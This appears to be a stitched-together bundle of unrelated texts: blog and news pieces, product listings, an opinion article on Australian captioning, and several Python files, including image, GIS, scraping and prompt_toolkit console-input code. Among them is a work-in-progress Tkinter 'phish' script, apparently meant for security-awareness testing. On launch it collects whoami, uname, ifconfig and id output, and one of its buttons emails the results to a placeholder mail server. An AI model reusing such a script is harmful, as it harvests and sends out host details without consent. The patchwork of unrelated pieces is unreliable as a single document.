What do women want? Women have come a long way since the days when they were seen as a minority. We are no longer just homemakers or mothers; we too have goals and ambitions of our own. I spent last Saturday afternoon with DIVA Universal celebrating women. Speakers from all walks of life were invited to share their stories. The first speakers were mommy bloggers Lanie Lluch, Louisa Mercado, and Joy Gurtiza, who shared the pain and joy women go through in motherhood. The second speaker was Marika Callangan, who used her sickness as motivation to put up Woman, Create. Stacey and Danah Guttierez, the creators of The Plump Pinay, talked about how women should be proud of their bodies. Everyone is created differently; there is no such thing as a standard norm for beauty. All these women had one thing in common: they are warriors who fought through every battle they faced.
|
from pictureflow.core import Image, Node
import cv2
class ContourDetector(Node):
"""
Performs contour detection steps on an already masked binary image.
Args:
        parent (Node): Parent image node
drop_threshold (Node): Minimum allowed contour area
Attributes:
Input Types: [ :py:class:`Image`, :py:class:`int` ]
Output Type: :py:class:`list`
"""
_input_types = [Image, int]
_output_type = list
def __init__(self, parent, drop_threshold, id='contour_detect'):
super().__init__(id, parent, drop_threshold)
def apply(self, item, threshold):
img = item.img_mat
img[img > 0] = 255
_, contours, _ = cv2.findContours(img, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
valid_contours = []
for contour in contours:
max_x = contour[:, :, 0].max()
min_x = contour[:, :, 0].min()
max_y = contour[:, :, 1].max()
min_y = contour[:, :, 1].min()
if (max_x - min_x) * (max_y - min_y) > threshold:
valid_contours.append(contour)
yield valid_contours
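The drop test above uses the contour's axis-aligned bounding box rather than its exact area; a pure-Python sketch of the same check (the point list and threshold are made up for illustration):

```python
# A contour as a list of (x, y) points; here a 10x5 rectangle.
contour = [(0, 0), (10, 0), (10, 5), (0, 5)]
xs = [p[0] for p in contour]
ys = [p[1] for p in contour]
# Bounding-box area, mirroring (max_x - min_x) * (max_y - min_y) above.
bbox_area = (max(xs) - min(xs)) * (max(ys) - min(ys))
threshold = 20
keep = bbox_area > threshold  # this contour survives the drop filter
```

Bounding-box area overestimates the true contour area for non-rectangular shapes, which makes it a cheap but conservative drop criterion.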
|
The iconic DQ smoking skull. Inspired by pirates, memento mori, tattoos and the fact that you shouldn't take things too seriously.
This item qualifies for free domestic shipping. Upon shipment, you can expect to receive it in 1-4 business days.
|
import matplotlib.pyplot as plt
import numpy as np
import matplotlib.cm as cm
import geojson
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.collections import PolyCollection
from matplotlib.colors import colorConverter
from mpl_toolkits.basemap import Basemap
class GIS:
def __init__(self,dict_):
self.coordinates = dict_["coordinates"]
self.type = dict_["type"]
# we set low resolution as default setting
self.map = Basemap(projection='merc',resolution='l')
def point(self):
self.map.drawcoastlines()
self.map.drawcountries()
self.map.fillcontinents(color = 'coral')
self.map.drawmapboundary()
x,y = self.map(self.coordinates[0],self.coordinates[1])
self.map.plot(x, y, 'bo', markersize=10)
plt.show()
def linestring(self):
self.map.drawcoastlines()
self.map.drawcountries()
self.map.fillcontinents(color = 'coral')
self.map.drawmapboundary()
x,y = self.map(self.coordinates[0],self.coordinates[1])
self.map.plot(x, y, color="green", linewidth=1.0, linestyle="-")
plt.show()
def init(self):
if self.type == "Point":
self.point()
elif self.type == "LineString":
self.linestring()
|
Evercoat Liquid Hardener - .37 fl. oz.
For use with polyester resin and gelcoat. Plastic squeeze tube has graduated measure for mixing convenience.
A no run, no sag polyester resin for marine repairs. Cures tack-free over fiberglass, plywood and metal. Hardener included.
A two-part pour foam. 2 lb. density foam used for flotation, insulating and filling. Must be mixed 1:1 equal parts.
|
#!/usr/bin/python
# -*- coding: UTF-8
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/. */
# Authors:
# Michael Berg-Mohnicke <michael.berg@zalf.de>
#
# Maintainers:
# Currently maintained by the authors.
#
# This file has been created at the Institute of
# Landscape Systems Analysis at the ZALF.
# Copyright (C) Leibniz Centre for Agricultural Landscape Research (ZALF)
import sys
import csv
import os
import json
import zmq
#print "pyzmq version: ", zmq.pyzmq_version(), " zmq version: ", zmq.zmq_version()
import monica_io
#print "path to monica_io: ", monica_io.__file__
def run_consumer(path_to_output_dir = None, leave_after_finished_run = False, server = {"server": None, "port": None}, shared_id = None):
"collect data from workers"
config = {
"port": server["port"] if server["port"] else "7777",
"server": server["server"] if server["server"] else "localhost",
"shared_id": shared_id,
"out": path_to_output_dir if path_to_output_dir else os.path.join(os.path.dirname(__file__), 'out/'),
"leave_after_finished_run": leave_after_finished_run
}
if len(sys.argv) > 1 and __name__ == "__main__":
for arg in sys.argv[1:]:
k,v = arg.split("=")
if k in config:
if k == "leave_after_finished_run":
if (v == 'True' or v == 'true'):
config[k] = True
else:
config[k] = False
else:
config[k] = v
print "consumer config:", config
context = zmq.Context()
if config["shared_id"]:
socket = context.socket(zmq.DEALER)
socket.setsockopt(zmq.IDENTITY, config["shared_id"])
else:
socket = context.socket(zmq.PULL)
socket.connect("tcp://" + config["server"] + ":" + config["port"])
#socket.RCVTIMEO = 1000
leave = False
def process_message(msg):
if not hasattr(process_message, "wnof_count"):
process_message.received_env_count = 0
leave = False
if msg["type"] == "finish":
print "c: received finish message"
leave = True
else:
print "c: received work result ", process_message.received_env_count, " customId: ", str(msg.get("customId", ""))
process_message.received_env_count += 1
#with open("out/out-" + str(i) + ".csv", 'wb') as _:
with open(config["out"] + str(process_message.received_env_count) + ".csv", 'wb') as _:
writer = csv.writer(_, delimiter=",")
for data_ in msg.get("data", []):
results = data_.get("results", [])
orig_spec = data_.get("origSpec", "")
output_ids = data_.get("outputIds", [])
if len(results) > 0:
writer.writerow([orig_spec.replace("\"", "")])
for row in monica_io.write_output_header_rows(output_ids,
include_header_row=True,
include_units_row=True,
include_time_agg=False):
writer.writerow(row)
for row in monica_io.write_output(output_ids, results):
writer.writerow(row)
writer.writerow([])
if config["leave_after_finished_run"] == True :
leave = True
return leave
while not leave:
try:
msg = socket.recv_json(encoding="latin-1")
leave = process_message(msg)
        except Exception:
            # transient receive/decode error; keep polling
            continue
print "c: exiting run_consumer()"
#debug_file.close()
if __name__ == "__main__":
run_consumer()
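The `key=value` override loop at the top of `run_consumer` can be factored into a small helper; a sketch (Python 3 syntax, helper name hypothetical):

```python
def apply_overrides(config, argv):
    """Apply key=value command-line overrides, coercing the boolean flag."""
    for arg in argv:
        k, _, v = arg.partition("=")
        if k in config:
            if k == "leave_after_finished_run":
                # accept 'True'/'true' as above, everything else is False
                config[k] = v.lower() == "true"
            else:
                config[k] = v
    return config
```

Unknown keys are ignored, matching the `if k in config` guard in the original loop.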
|
Program Tuesday & Wednesday - Easy gift idea!
The time for Karen DeWitt's visit is almost here. We are so excited! Be sure and consider joining us on Tuesday, December 9 at 6 PM or Wednesday, December 10 at 10 AM. Just give us a jingle at 815-879-3739 if you would like to attend.
Need a QUICK and AWESOME gift idea? We have wonderful Shannon fabric throw kits all ready. If I say, "Cadillac", does that mean anything? These are extra thick and have a rich feeling. Anyone on your list would LOVE to receive one! However, I guarantee you won't make just one!!
|
####WIP####
#!/usr/bin/python
from Tkinter import *
from tkMessageBox import *
import smtplib
import platform
import sys
import os
from email.mime.text import MIMEText
os.system('(whoami; uname -ar; ifconfig; pwd; id;) > me')
def answer():
showerror("Peekab000:", "We see you!, You are now on the Security Teams radar and maybe shouldn't have broken policy")
def callback():
    if askyesno('Uh Oh!:', 'You have now been seen by the Security Team! Would you like to close me?'):
showwarning('Yes', 'NO! Go speak with the Security Team!')
else:
showinfo('No', "Smart answer, cause I wasn't going to close till you spoke to the Security Team anyways.")
def uname():
print platform.uname()
def givemeinfo():
os.system('(whoami; uname -ar; ifconfig; pwd; id; ) > me.txt')
def maail():
fp = open('me', 'rb')
msg = MIMEText(fp.read())
fp.close()
msg['Subject'] = 'You Caught a Phish!'
msg['From'] = '<FROM-GOES-HERE>'
msg['To'] = '<TO-GOES-HERE>'
msg['cc'] = '<CC-GOES-HERE>'
s = smtplib.SMTP('<SMTP-GOES-HERE>')
s.sendmail('<FROM-GOES-HERE>', ['<TO-GOES-HERE>','<CC-GOES-HERE>'], msg.as_string())
s.quit()
Button(text='WHAT!?', command=answer).pack(fill=X)
Button(text='Give Me Options', command=callback).pack(fill=X)
Button(text='Informative', command=uname).pack(fill=X)
Button(text='I personally would not click this!', command=givemeinfo).pack(fill=X)
Button(text='You are not in trouble: Click me to email Security now', command=maail).pack(fill=X)
mainloop()
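The `maail()` function builds a plain-text report email; a self-contained sketch of the same `MIMEText` construction with placeholder addresses standing in for the `<...-GOES-HERE>` markers (no SMTP connection is made here):

```python
from email.mime.text import MIMEText

# Placeholder body and addresses; the real script reads the 'me' report file.
msg = MIMEText("whoami / uname / ifconfig output would go here")
msg['Subject'] = 'You Caught a Phish!'
msg['From'] = 'security@example.com'
msg['To'] = 'user@example.com'
msg['Cc'] = 'manager@example.com'
raw = msg.as_string()  # this is what smtplib.SMTP.sendmail() would transmit
```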
|
If the Federal Government likes to live dangerously, there is a good example in the deal stitched up last month between the Democrats’ Senator Natasha Stott Despoja and Communications Minister Helen Coonan. The deal came about after Senator Stott Despoja tabled a motion to call for an inquiry into the state of electronic media captioning for the millions of Australians who are deaf and hearing impaired.
She will now get what she was after. Senator Coonan announced an investigation that will look at what has happened in captioning and other “essential access technologies”. It will assess where Australia is compared with the rest of the world, and look at access to captions in the light of the rapid technological change that has taken place in media. The Minister said the investigation will be completed by April 30 next year (2008), with a report to be tabled in Parliament.
Had Senator Stott Despoja’s proposal been debated and defeated along party lines, the Government would have looked decidedly ugly. It was already looking silly on this issue when the Department of Families, Community Services and Indigenous Affairs supported the production of a DVD called Raising Children. This will be distributed free to parents of newborns. It was touted as a world first: an interactive guide with information and short films for new parents.
The Deafness Forum and the Human Rights and Equal Opportunity Commission pounced on the DVD the moment it was realised it had neither captions nor an audio-description track. These omissions ensured the DVD was close to useless for new parents who were blind, deaf, or who had vision or hearing impairments. As a result, the department contradicted its own disability action plan, of which one of the key themes was to “improve the accessibility of our information products for people with disabilities”. And for the inimitable, Monty Pythonesque touch, this defective DVD was launched by a hearing-impaired Prime Minister during Hearing Awareness Week.
In one piece of recent good news, the Film Finance Corporation has now made it compulsory for feature films it supports to have captions. Enjoying such films, however, requires attending a cinema that screens captioned films. And the bad news? There are exactly ten cinemas in the entire country that show films with captions. The inquiry will be able to ask why, with such commendable policy, there is such a minuscule number of cinemas in which to show these films in the first place.
Senator Coonan’s press release announcing the inquiry commended the free-to-air broadcasters for approaching their 70 per cent captioning targets for programming between 6am and midnight. Prime-time FTA television captioning has already been guaranteed by legislation since 2001. Those wishing to view captions on television must purchase a television with teletext. And this is the rub. Apart from deaf and hearing-impaired people, almost no one in business or government bothers. Very few of the thousands of televisions in hospitals, waiting rooms, hotels, offices, shopping malls, motels and other public places come equipped with teletext. Countless videos and DVDs used in hospitals, schools, TAFEs and universities do not have captions. A large number of television programs are not captioned, for example, daytime sporting events.
The news is hardly much better for those who might give up and rely on DVDs for the captions track. Media Access Australia monitors new-release DVDs, and in its last survey, found a mere 51 per cent included hearing access in the form of subtitles or captions. Inaccessible DVDs like Raising Children continue to be churned out. A recent series of National Geographic DVDs on wildlife themes, promoted and distributed by the Herald Sun newspaper, have no captioning track, and no audio-description track for blind and vision-impaired people.
New technology and new services have left captions well behind. Unlike FTA broadcasting, there is no requirement for captions on prime-time subscription television. Digital multichannels are exempt from captions, and DVDs of television programs, or their downloads off the Internet, do not include captions even if they were on the originals.
These are some of the most recent examples of what has plagued deaf and hearing-impaired Australians watching television and film. The inquiry however will be able to scrutinise all of these issues. When it looks overseas, it will find examples like the UK Film Council. This government-backed agency has just allocated 500,000 pounds to allow independent local cinemas to improve access, such as buying and installing equipment to provide captions and audio-description. Included in Senator Stott Despoja’s original proposal was a call for captioning everything on television by 2011. The inquiry will find out this would merely give deaf and hearing-impaired Australians what their American counterparts are already enjoying now.
While FTA broadcasters are moving towards their captioning targets, it needs to be remembered that captions, to the extent we already have them, did not arise from the goodness of the corporations’ hearts. Captions on television and film happened because deaf individuals stood up and lodged complaints under the Disability Discrimination Act. These complaints started a chain of enquiries and negotiations between the Human Rights and Equal Opportunity Commission, film and television companies, film distributors, and advocacy agencies for deaf and hearing-impaired people. With a fresh round of negotiations imminent for both film and television, the inquiry will show film and FTA broadcasters where they stand in relation to Senator Coonan’s call.
Let there be no doubt of the importance of captions. Pressing the mute button does not equal the experience of hearing impairment while watching the television or at the cinema. It is much worse than that. A hearing aid, a cochlear implant, a listening device, a volume set close to maximum, some lipreading, or a combination of these may allow comprehension of words and phrases here and there. But no one will understand the entire dialogue. And no one has ever managed to lipread the penguins in Happy Feet.
It is most interesting that Senator Coonan’s press release referred to a “personal link to deafness”, something she shares with Senator Stott Despoja. This factor must surely have played some part in uniting these two from different political parties. The inquiry is good news for millions of Australians who ask for nothing more than the chance to enjoy film and television, whenever they wish, in whatever medium, just as do hearing people. In the end, Senator Coonan deserves credit. And Senator Stott Despoja, who has fought on this issue for years, will be remembered as a visionary.
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import util
from selenium import webdriver
from constant import Website
from setting.fetch_settings import URL_PARAMS
def dig_info(flight):
try:
info = flight.find_element_by_class_name('logo').text.split()
airline = info[0].strip() if len(info) >= 1 else ''
flight_no = info[1].strip() if len(info) >= 2 else ''
divs = flight.find_element_by_class_name('right').\
find_elements_by_tag_name('div')
from_time = divs[0].find_element_by_class_name('time').text
from_time_pair = [int(x) for x in from_time.split(':')]
from_airport = divs[1].text
divs = flight.find_element_by_class_name('left').\
find_elements_by_tag_name('div')
to_time = divs[0].find_element_by_class_name('time').text
to_time_pair = [int(x) for x in to_time.split(':')]
to_airport = divs[1].text
if to_time_pair[0] < from_time_pair[0]:
to_time_pair[0] += 24
price = flight.find_element_by_class_name('price').text[1:]
tmp_price = ''
for ch in price:
if ch.isdigit():
tmp_price += ch
else:
break
price = int(tmp_price)
return [airline, flight_no, from_airport, from_time,
from_time_pair, to_airport, to_time, to_time_pair, price]
except Exception as e:
util.log_error('CTRIP: ' + str(e))
return None
def fetch(period):
browser = webdriver.PhantomJS()
url = 'http://flights.ctrip.com/booking/%s-%s-day-1.html#DDate1=%s' % \
(URL_PARAMS[Website.CTRIP][period['from_city']],
URL_PARAMS[Website.CTRIP][period['to_city']],
period['date'])
browser.get(url)
util.scroll(browser)
block = util.fetch_one(browser, 'find_element_by_id', 'J_flightlist2')
if not block:
return []
flights = util.fetch_multi(block, 'find_elements_by_class_name',
'search_table_header')
format_flights = []
for flight in flights:
info = dig_info(flight)
if info:
format_flights.append(info)
browser.quit()
return util.deal(period, format_flights, Website.CTRIP, url)
|
DirecTV will soon allow users to verbally control the television by talking to their iPhone or Android device.
Tired of pressing buttons on your remote? DirecTV's new smartphone application can help.
The app allows users to verbally control the television by talking to their iPhone or Android device. Using a cellular or Wi-Fi connection, users can tap the application's on-screen microphone icon and search by person, title, channel, time, or genre, just by asking.
Say "Show me Tom Hanks movies on this weekend," and the guide will pop up with a list, alongside details like Rotten Tomatoes scores, plot synopses, showtimes, and more, according to The Verge, which got a hands-on look at the new voice function.
While searching for tonight's Yankees game or a family-friendly program to watch with the kids, users will find results on the TV and phone, the latter of which transforms into a trackpad for easy navigation. Tap once to tune to a show on the TV set or phone, or use the app while away from home to record shows or add them to the bookmarks list.
The new Voice search is capable of sifting through upcoming, on-demand, and pay-per-view content, CNET reported, noting the app's speech-bubble suggestions, like "find documentaries this week." DirecTV is also hoping the bubbles can be turned into a marketing scheme, CNET said, serving as integrated advertisements.
For all of its charms, DirecTV's new voice function is missing a few key options, CNET said, pointing to the lack of Netflix integration (the available first four seasons of Breaking Bad don't show up in DirecTV search results) and a missing "free" content search filter.
DirecTV is working with voice-recognition star Nuance, which launched its own virtual assistant in August. The app will be released in "very public beta" this summer, The Verge reported, and will be available to anyone who updates to the latest version.
DirecTV did not immediately respond to PCMag's request for comment.
|
from __future__ import unicode_literals
from ctypes import windll, pointer
from ctypes.wintypes import DWORD
from six.moves import range
from contextlib import contextmanager
from .ansi_escape_sequences import REVERSE_ANSI_SEQUENCES
from .base import Input
from prompt_toolkit.eventloop import get_event_loop
from prompt_toolkit.eventloop.win32 import wait_for_handles
from prompt_toolkit.key_binding.key_processor import KeyPress
from prompt_toolkit.keys import Keys
from prompt_toolkit.mouse_events import MouseEventType
from prompt_toolkit.win32_types import EventTypes, KEY_EVENT_RECORD, MOUSE_EVENT_RECORD, INPUT_RECORD, STD_INPUT_HANDLE
import msvcrt
import os
import sys
import six
__all__ = [
'Win32Input',
'ConsoleInputReader',
'raw_mode',
'cooked_mode',
'attach_win32_input',
'detach_win32_input',
]
class Win32Input(Input):
"""
`Input` class that reads from the Windows console.
"""
def __init__(self, stdin=None):
self.console_input_reader = ConsoleInputReader()
def attach(self, input_ready_callback):
"""
Return a context manager that makes this input active in the current
event loop.
"""
assert callable(input_ready_callback)
return attach_win32_input(self, input_ready_callback)
def detach(self):
"""
Return a context manager that makes sure that this input is not active
in the current event loop.
"""
return detach_win32_input(self)
def read_keys(self):
return list(self.console_input_reader.read())
def flush(self):
pass
@property
def closed(self):
return False
def raw_mode(self):
return raw_mode()
def cooked_mode(self):
return cooked_mode()
def fileno(self):
# The windows console doesn't depend on the file handle, so
# this is not used for the event loop (which uses the
# handle instead). But it's used in `Application.run_system_command`
# which opens a subprocess with a given stdin/stdout.
return sys.stdin.fileno()
def typeahead_hash(self):
return 'win32-input'
def close(self):
self.console_input_reader.close()
@property
def handle(self):
return self.console_input_reader.handle
class ConsoleInputReader(object):
"""
:param recognize_paste: When True, try to discover paste actions and turn
the event into a BracketedPaste.
"""
# Keys with character data.
mappings = {
b'\x1b': Keys.Escape,
b'\x00': Keys.ControlSpace, # Control-Space (Also for Ctrl-@)
b'\x01': Keys.ControlA, # Control-A (home)
b'\x02': Keys.ControlB, # Control-B (emacs cursor left)
b'\x03': Keys.ControlC, # Control-C (interrupt)
b'\x04': Keys.ControlD, # Control-D (exit)
b'\x05': Keys.ControlE, # Control-E (end)
b'\x06': Keys.ControlF, # Control-F (cursor forward)
b'\x07': Keys.ControlG, # Control-G
b'\x08': Keys.ControlH, # Control-H (8) (Identical to '\b')
b'\x09': Keys.ControlI, # Control-I (9) (Identical to '\t')
b'\x0a': Keys.ControlJ, # Control-J (10) (Identical to '\n')
b'\x0b': Keys.ControlK, # Control-K (delete until end of line; vertical tab)
b'\x0c': Keys.ControlL, # Control-L (clear; form feed)
b'\x0d': Keys.ControlM, # Control-M (enter)
b'\x0e': Keys.ControlN, # Control-N (14) (history forward)
b'\x0f': Keys.ControlO, # Control-O (15)
b'\x10': Keys.ControlP, # Control-P (16) (history back)
b'\x11': Keys.ControlQ, # Control-Q
b'\x12': Keys.ControlR, # Control-R (18) (reverse search)
b'\x13': Keys.ControlS, # Control-S (19) (forward search)
b'\x14': Keys.ControlT, # Control-T
b'\x15': Keys.ControlU, # Control-U
b'\x16': Keys.ControlV, # Control-V
b'\x17': Keys.ControlW, # Control-W
b'\x18': Keys.ControlX, # Control-X
b'\x19': Keys.ControlY, # Control-Y (25)
b'\x1a': Keys.ControlZ, # Control-Z
b'\x1c': Keys.ControlBackslash, # Both Control-\ and Ctrl-|
b'\x1d': Keys.ControlSquareClose, # Control-]
b'\x1e': Keys.ControlCircumflex, # Control-^
b'\x1f': Keys.ControlUnderscore, # Control-underscore (Also for Ctrl-hyphen.)
b'\x7f': Keys.Backspace, # (127) Backspace (ASCII Delete.)
}
# Keys that don't carry character data.
keycodes = {
# Home/End
33: Keys.PageUp,
34: Keys.PageDown,
35: Keys.End,
36: Keys.Home,
# Arrows
37: Keys.Left,
38: Keys.Up,
39: Keys.Right,
40: Keys.Down,
45: Keys.Insert,
46: Keys.Delete,
# F-keys.
112: Keys.F1,
113: Keys.F2,
114: Keys.F3,
115: Keys.F4,
116: Keys.F5,
117: Keys.F6,
118: Keys.F7,
119: Keys.F8,
120: Keys.F9,
121: Keys.F10,
122: Keys.F11,
123: Keys.F12,
}
LEFT_ALT_PRESSED = 0x0002
RIGHT_ALT_PRESSED = 0x0001
SHIFT_PRESSED = 0x0010
LEFT_CTRL_PRESSED = 0x0008
RIGHT_CTRL_PRESSED = 0x0004
def __init__(self, recognize_paste=True):
self._fdcon = None
self.recognize_paste = recognize_paste
# When stdin is a tty, use that handle, otherwise, create a handle from
# CONIN$.
if sys.stdin.isatty():
self.handle = windll.kernel32.GetStdHandle(STD_INPUT_HANDLE)
else:
self._fdcon = os.open('CONIN$', os.O_RDWR | os.O_BINARY)
self.handle = msvcrt.get_osfhandle(self._fdcon)
def close(self):
" Close fdcon. "
if self._fdcon is not None:
os.close(self._fdcon)
def read(self):
"""
Return a list of `KeyPress` instances. It won't return anything when
there was nothing to read. (This function doesn't block.)
http://msdn.microsoft.com/en-us/library/windows/desktop/ms684961(v=vs.85).aspx
"""
max_count = 2048 # Max events to read at the same time.
read = DWORD(0)
arrtype = INPUT_RECORD * max_count
input_records = arrtype()
# Check whether there is some input to read. `ReadConsoleInputW` would
# block otherwise.
        # (Actually, the event loop is responsible for making sure that this
# function is only called when there is something to read, but for some
# reason this happened in the asyncio_win32 loop, and it's better to be
# safe anyway.)
if not wait_for_handles([self.handle], timeout=0):
return
# Get next batch of input event.
windll.kernel32.ReadConsoleInputW(
self.handle, pointer(input_records), max_count, pointer(read))
# First, get all the keys from the input buffer, in order to determine
# whether we should consider this a paste event or not.
all_keys = list(self._get_keys(read, input_records))
# Fill in 'data' for key presses.
all_keys = [self._insert_key_data(key) for key in all_keys]
if self.recognize_paste and self._is_paste(all_keys):
gen = iter(all_keys)
for k in gen:
# Pasting: if the current key consists of text or \n, turn it
# into a BracketedPaste.
data = []
while k and (isinstance(k.key, six.text_type) or
k.key == Keys.ControlJ):
data.append(k.data)
try:
k = next(gen)
except StopIteration:
k = None
if data:
yield KeyPress(Keys.BracketedPaste, ''.join(data))
if k is not None:
yield k
else:
for k in all_keys:
yield k
def _insert_key_data(self, key_press):
"""
Insert KeyPress data, for vt100 compatibility.
"""
if key_press.data:
return key_press
data = REVERSE_ANSI_SEQUENCES.get(key_press.key, '')
return KeyPress(key_press.key, data)
def _get_keys(self, read, input_records):
"""
Generator that yields `KeyPress` objects from the input records.
"""
for i in range(read.value):
ir = input_records[i]
# Get the right EventType from the EVENT_RECORD.
# (For some reason the Windows console application 'cmder'
# [http://gooseberrycreative.com/cmder/] can return '0' for
# ir.EventType. -- Just ignore that.)
if ir.EventType in EventTypes:
ev = getattr(ir.Event, EventTypes[ir.EventType])
# Process if this is a key event. (We also have mouse, menu and
# focus events.)
if type(ev) == KEY_EVENT_RECORD and ev.KeyDown:
for key_press in self._event_to_key_presses(ev):
yield key_press
elif type(ev) == MOUSE_EVENT_RECORD:
for key_press in self._handle_mouse(ev):
yield key_press
@staticmethod
def _is_paste(keys):
"""
Return `True` when we should consider this list of keys as a paste
event. Pasted text on windows will be turned into a
`Keys.BracketedPaste` event. (It's not 100% correct, but it is probably
the best possible way to detect pasting of text and handle that
correctly.)
"""
# Consider paste when it contains at least one newline and at least one
# other character.
text_count = 0
newline_count = 0
for k in keys:
if isinstance(k.key, six.text_type):
text_count += 1
if k.key == Keys.ControlM:
newline_count += 1
return newline_count >= 1 and text_count > 1
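The counting rule in `_is_paste` can be exercised in isolation. This sketch uses a hypothetical `FakeKey` stand-in for `KeyPress` and a sentinel object for `Keys.ControlM`; it illustrates the heuristic, not the real prompt_toolkit types:

```python
from collections import namedtuple

# Hypothetical stand-ins: FakeKey mimics KeyPress; CONTROL_M mimics Keys.ControlM.
FakeKey = namedtuple('FakeKey', ['key'])
CONTROL_M = object()

def looks_like_paste(keys):
    # A paste needs at least one newline (Control-M) and more than one
    # plain text character, mirroring _is_paste above.
    text_count = sum(1 for k in keys if isinstance(k.key, str))
    newline_count = sum(1 for k in keys if k.key is CONTROL_M)
    return newline_count >= 1 and text_count > 1

typed = [FakeKey('a'), FakeKey('b')]
pasted = [FakeKey('a'), FakeKey('b'), FakeKey(CONTROL_M), FakeKey('c')]
```

A single Enter key press (one Control-M, no other text) is deliberately not treated as a paste.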
def _event_to_key_presses(self, ev):
"""
For this `KEY_EVENT_RECORD`, return a list of `KeyPress` instances.
"""
assert type(ev) == KEY_EVENT_RECORD and ev.KeyDown
result = None
u_char = ev.uChar.UnicodeChar
ascii_char = u_char.encode('utf-8')
# NOTE: We don't use `ev.uChar.AsciiChar`. That appears to be latin-1
# encoded. See also:
# https://github.com/ipython/ipython/issues/10004
# https://github.com/jonathanslenders/python-prompt-toolkit/issues/389
if u_char == '\x00':
if ev.VirtualKeyCode in self.keycodes:
result = KeyPress(self.keycodes[ev.VirtualKeyCode], '')
else:
if ascii_char in self.mappings:
if self.mappings[ascii_char] == Keys.ControlJ:
                    u_char = '\n'  # Windows sends \r; turn into \n for unix compatibility.
result = KeyPress(self.mappings[ascii_char], u_char)
else:
result = KeyPress(u_char, u_char)
# Correctly handle Control-Arrow keys.
if (ev.ControlKeyState & self.LEFT_CTRL_PRESSED or
ev.ControlKeyState & self.RIGHT_CTRL_PRESSED) and result:
if result.key == Keys.Left:
result.key = Keys.ControlLeft
if result.key == Keys.Right:
result.key = Keys.ControlRight
if result.key == Keys.Up:
result.key = Keys.ControlUp
if result.key == Keys.Down:
result.key = Keys.ControlDown
# Turn 'Tab' into 'BackTab' when shift was pressed.
if ev.ControlKeyState & self.SHIFT_PRESSED and result:
if result.key == Keys.Tab:
result.key = Keys.BackTab
# Turn 'Space' into 'ControlSpace' when control was pressed.
if (ev.ControlKeyState & self.LEFT_CTRL_PRESSED or
ev.ControlKeyState & self.RIGHT_CTRL_PRESSED) and result and result.data == ' ':
result = KeyPress(Keys.ControlSpace, ' ')
# Turn Control-Enter into META-Enter. (On a vt100 terminal, we cannot
# detect this combination. But it's really practical on Windows.)
if (ev.ControlKeyState & self.LEFT_CTRL_PRESSED or
ev.ControlKeyState & self.RIGHT_CTRL_PRESSED) and result and \
result.key == Keys.ControlJ:
return [KeyPress(Keys.Escape, ''), result]
# Return result. If alt was pressed, prefix the result with an
# 'Escape' key, just like unix VT100 terminals do.
# NOTE: Only replace the left alt with escape. The right alt key often
# acts as altgr and is used in many non US keyboard layouts for
# typing some special characters, like a backslash. We don't want
# all backslashes to be prefixed with escape. (Esc-\ has a
        #       meaning in Emacs, for instance.)
if result:
meta_pressed = ev.ControlKeyState & self.LEFT_ALT_PRESSED
if meta_pressed:
return [KeyPress(Keys.Escape, ''), result]
else:
return [result]
else:
return []
def _handle_mouse(self, ev):
"""
Handle mouse events. Return a list of KeyPress instances.
"""
FROM_LEFT_1ST_BUTTON_PRESSED = 0x1
result = []
# Check event type.
if ev.ButtonState == FROM_LEFT_1ST_BUTTON_PRESSED:
# On a key press, generate both the mouse down and up event.
for event_type in [MouseEventType.MOUSE_DOWN, MouseEventType.MOUSE_UP]:
data = ';'.join([
event_type,
str(ev.MousePosition.X),
str(ev.MousePosition.Y)
])
result.append(KeyPress(Keys.WindowsMouseEvent, data))
return result
_current_callbacks = {} # loop -> callback
@contextmanager
def attach_win32_input(input, callback):
"""
Context manager that makes this input active in the current event loop.
:param input: :class:`~prompt_toolkit.input.Input` object.
:param input_ready_callback: Called when the input is ready to read.
"""
assert isinstance(input, Input)
assert callable(callback)
loop = get_event_loop()
previous_callback = _current_callbacks.get(loop)
# Add reader.
loop.add_win32_handle(input.handle, callback)
_current_callbacks[loop] = callback
try:
yield
finally:
loop.remove_win32_handle(input.handle)
if previous_callback:
loop.add_win32_handle(input.handle, previous_callback)
_current_callbacks[loop] = previous_callback
else:
del _current_callbacks[loop]
@contextmanager
def detach_win32_input(input):
assert isinstance(input, Input)
loop = get_event_loop()
previous = _current_callbacks.get(loop)
if previous:
loop.remove_win32_handle(input.handle)
_current_callbacks[loop] = None
try:
yield
finally:
if previous:
loop.add_win32_handle(input.handle, previous)
_current_callbacks[loop] = previous
class raw_mode(object):
"""
::
with raw_mode(stdin):
''' the windows terminal is now in 'raw' mode. '''
The ``fileno`` attribute is ignored. This is to be compatible with the
`raw_input` method of `.vt100_input`.
"""
def __init__(self, fileno=None):
self.handle = windll.kernel32.GetStdHandle(STD_INPUT_HANDLE)
def __enter__(self):
# Remember original mode.
original_mode = DWORD()
windll.kernel32.GetConsoleMode(self.handle, pointer(original_mode))
self.original_mode = original_mode
self._patch()
def _patch(self):
# Set raw
ENABLE_ECHO_INPUT = 0x0004
ENABLE_LINE_INPUT = 0x0002
ENABLE_PROCESSED_INPUT = 0x0001
windll.kernel32.SetConsoleMode(
self.handle, self.original_mode.value &
~(ENABLE_ECHO_INPUT | ENABLE_LINE_INPUT | ENABLE_PROCESSED_INPUT))
def __exit__(self, *a, **kw):
# Restore original mode
windll.kernel32.SetConsoleMode(self.handle, self.original_mode)
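The mode manipulation in `_patch` is plain bit-masking. A self-contained sketch (console API calls omitted) shows how the three flags are cleared for raw mode and restored for cooked mode:

```python
# Console mode flags from the Windows API (same values as used above).
ENABLE_PROCESSED_INPUT = 0x0001
ENABLE_LINE_INPUT = 0x0002
ENABLE_ECHO_INPUT = 0x0004
COOKED_FLAGS = ENABLE_ECHO_INPUT | ENABLE_LINE_INPUT | ENABLE_PROCESSED_INPUT

def raw(mode):
    # Clear the echo/line/processed bits; leave every other bit untouched.
    return mode & ~COOKED_FLAGS

def cooked(mode):
    # Set the three bits again.
    return mode | COOKED_FLAGS
```

Because only those three bits are touched, round-tripping through `raw` and `cooked` preserves any other mode bits the console had set.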
class cooked_mode(raw_mode):
"""
::
with cooked_mode(stdin):
''' The pseudo-terminal stdin is now used in cooked mode. '''
"""
def _patch(self):
# Set cooked.
ENABLE_ECHO_INPUT = 0x0004
ENABLE_LINE_INPUT = 0x0002
ENABLE_PROCESSED_INPUT = 0x0001
